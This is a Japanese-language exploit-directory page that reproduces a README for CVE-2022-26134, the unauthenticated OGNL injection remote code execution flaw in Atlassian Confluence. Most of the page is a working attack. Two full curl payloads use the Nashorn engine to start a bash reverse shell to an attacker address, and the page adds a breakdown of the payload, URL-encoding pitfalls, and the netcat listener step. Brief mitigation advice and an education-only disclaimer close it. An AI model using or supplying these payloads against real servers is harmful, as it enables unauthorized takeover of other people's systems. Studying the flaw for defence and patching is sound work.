Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-26134 — AtlassianのQuestions for ConfluenceアプリにおけるCVE-2022-26134の活発な悪用 | Kitploit
ツール/GitHubGitHub/khalidhaimur/cve-2022-26134
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育リモートアクセスツール
GitHubkhalidhaimur/cve-2022-26134

CVE-2022-26134

AtlassianのQuestions for ConfluenceアプリにおけるCVE-2022-26134の活発な悪用

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Confluence CVE-2022-26134 の実際の悪用

概要

CVE-2022-26134 は、Atlassian Confluence に影響を与える深刻な**リモートコード実行(RCE)**脆弱性です。この脆弱性により、認証されていない攻撃者が脆弱なエンドポイントに OGNL 式を注入することで、任意のコードを実行できる可能性があります。

影響を受けるバージョン

  • パッチ適用済みリリースより前の、Atlassian Confluence Server および Data Center のすべてのサポート対象バージョン。

エクスプロイトの詳細

次の CURL コマンドは、Java の Nashorn エンジンを利用してリバースシェルを実行する、この脆弱性の実際の悪用を示しています:

root@kitploit:~
curl -v http://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/10.0.0.28/1270%200%3E%261%27%29.start%28%29%22%29%7D/

これらの変更を行う際には、URL エンコーディングも考慮する必要があります。 プルーフ・オブ・コンセプトのペイロード文字列は完全には URL エンコードされていません。一部の文字(特に「.」「-」「/」)はエンコードされていません。 常にそうとは限りませんが、このエクスプロイトの場合、これはペイロードの機能にとって重要であることがわかります。これらの文字のいずれかがエンコードされると、 サーバーは URL を異なる方法で解析し、ペイロードが実行されない可能性があります。つまり、ペイロードを変更した後、ペイロード全体に URL エンコーディングを適用することはできません。

curl http://192.168.50.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.118.4/4444%200%3E%261%27%29.start%28%29%22%29%7D/

ペイロードの内訳

  1. ${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval(...)}
    • Java Nashorn スクリプトエンジンを使用して OGNL 式を評価します。
  2. new java.lang.ProcessBuilder().command('bash','-c','bash -i > /dev/tcp/10.0.0.28/1270 0>&1').start()
    • 10.0.0.28:1270 に接続し直すリバースシェルを起動します。

悪用の手順

  1. 攻撃マシンにリスナーを設定します:
    root@kitploit:~
    nc -lvnp 1270
    
  2. CURL エクスプロイトコマンドを実行します。
  3. 悪用が成功すると、リバースシェルを受け取ります。

緩和策

  • Atlassian は影響を受けるバージョン向けのセキュリティパッチをリリースしています。直ちに最新バージョンへ更新することを強くお勧めします。
  • 信頼できないソースからのConfluence サーバーへのアクセスを制限します。
  • OGNL 式を含む不審なリクエストがないかログを監視します。

参考情報

  • Atlassian セキュリティアドバイザリ
  • CVE-2022-26134 の詳細

免責事項

このドキュメントは教育目的のみを対象としています。システムへの不正な悪用は違法であり、重大な結果を招く可能性があります。セキュリティ評価を実施する前に、必ず適切な許可を取得してください。

ツールをダウンロード